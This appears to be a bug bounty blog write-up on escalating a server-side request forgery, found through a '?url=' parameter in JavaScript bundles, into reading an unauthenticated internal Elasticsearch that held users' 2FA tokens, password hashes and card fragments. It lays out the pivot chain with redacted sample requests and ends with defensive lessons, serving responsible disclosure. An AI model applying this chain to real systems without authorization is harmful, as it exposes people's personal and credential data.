SSRF to PII Data Leak
How I escalated a Server-Side Request Forgery (SSRF) vulnerability into a PII leak affecting 50,000 users.
One of the first major bugs I found in my bug bounty journey was an SSRF-based Personally Identifiable Information (PII) data leak through an exposed internal service. It affected an estimated 50,000 users.
Disclaimer: Company names and exploit details have been intentionally omitted. All testing was conducted ethically and within scope of bug bounty program.
The Setup
I came across a program that had a pretty limited scope. Just one domain. But I was genuinely interested in the product, so I decided to take a look.
The first thing I did was go through the application like a normal user. I was not trying to find any bugs yet. I just wanted to understand how the product worked, what features it had, and what was possible from a user’s point of view.
After spending some time with it, I had a good idea of how everything worked. That is when I switched gears and started “hunting” for bugs.
Recon
I opened up the browser Developer Tools and looked through the JavaScript files. Luckily, the app was using React JS. I like going through React apps because they are usually easy to read (at least for me).
So I wrote a Python script that would grab all the JS files. In React apps, you usually find bundle files generated by build tools like Webpack or Vite. They look something like this:
1
2
3
4
5
6
let chunkMap = {
"chunk1": "29e3abf9",
"chunk2": "a38cbfa1"
};
Object.entries(chunkMap).map(([name, hash]) => `${name}.${hash}.js`);
I copied the chunkMap
object to my local environment and started creating links to each JS files.
Imagine something like this:
1
`https://example.com/chunk1.29e3abf9.js`
Then I wrote another script to fetch those JS files and save them in a folder.
After downloading everything, I ran a tool called LinkFinder to pull out all the endpoints and API URLs used in the frontend.
That is when I saw this interesting endpoint:
1
/something/load?url=
The ?url=
parameter instantly raised red flags.
The SSRF
I tested the endpoint, and sure enough, it was vulnerable to SSRF. The response was coming straight to my screen.
For those who do not know, SSRF (Server-Side Request Forgery) is when you can get the server to make HTTP requests on your behalf. This lets you reach internal services, scan internal networks, and sometimes escalate to more serious issues.
I wanted to dig deeper right away, but the program policy said I had to report any findings first before doing further testing. So I paused for a bit and wrote a quick report.
Escalation
After reporting, I wanted to see how far I could take this.
I tested different URL schemes like gopher://
, redis://
, and file://
to see if I could turn this into something bigger. But there was a filter in place. Only http
and https
were allowed.
So I changed focus. I wanted to know who was making the request.
I spun up a webhook service and pointed the SSRF at it like this:
1
/something/download-image?url=https://<my-secure-webhook-service>.com
When the request hit my server, I grabbed the IP address of the source. I ran the IP through Shodan, and I found a bunch of open ports (big red flag!).
1
https://www.shodan.io/host/<ip-address>
One of those was Prometheus Node Exporter instance running inside the Kubernetes cluster.
It exposed a wide range of metrics; imagine seeing hundreds of internal IPs and ports across the infra. Among them was the internal IP of an Elasticsearch service running on port 9200.
Here is an example of what I saw:
1
node_ipvs_backend_connections_active{local_address="10.X.X.X",local_mark="",local_port="9200",proto="TCP",remote_address="10.X.X.X",remote_port="9200"}
The Data Leak
Elasticsearch was only exposed internally. But now I could reach it through SSRF.
1
/something/download-image?url=https://10.X.X.X:9200
And to make things worse (or better, depending on how you look at it), it had no authentication.
I started going through the Elasticsearch API. I was hoping to find something that could lead to RCE, maybe something like SSH keys. Instead, I found something even more serious.
The application was logging a lot of sensitive information in Elasticsearch, including:
- TOTP tokens used for 2FA
- Password hashes
- Emails
- Names
- Partial credit card details
- And more…
Overview
Here’s a high-level view of the full exploit chain:
Finishing Up
That was the point where I stopped digging. I didn’t go any further after confirming the data leak. I was still new to bug bounty, and stumbling upon something this serious so early in my journey was honestly a little scary.
I updated the report with everything I had found.
The program patched the issue shortly after.
What I Learned
Blue Team Perspective:
- Internal does not mean safe. Use proper authentication and authorization for everything, including internal services (Zero Trust!!!).
- Do not store sensitive data (like password hashes, TOTP tokens, partial credit card info) in more places than necessary. Especially not in log or monitoring systems.
- Use allow list when you are loading things using user provided URL.
- Keep internal services actually internal. Do not expose them to the internet (especially if they contain compromising information).
Bug Bounty Perspective:
- Do not ignore parameters like
?url=
- Go through all the JavaScript. Yes, even the bundle files. That is where you find the good stuff.
- SSRF is one of the best bugs out there. You can escalate it in so many ways.
- Always follow program rules.
- Small scope does not mean no bugs.
- Try to increase the severity of your bugs. Not just for the bounty, but because it is actually fun to chain things together and see how far you can take it.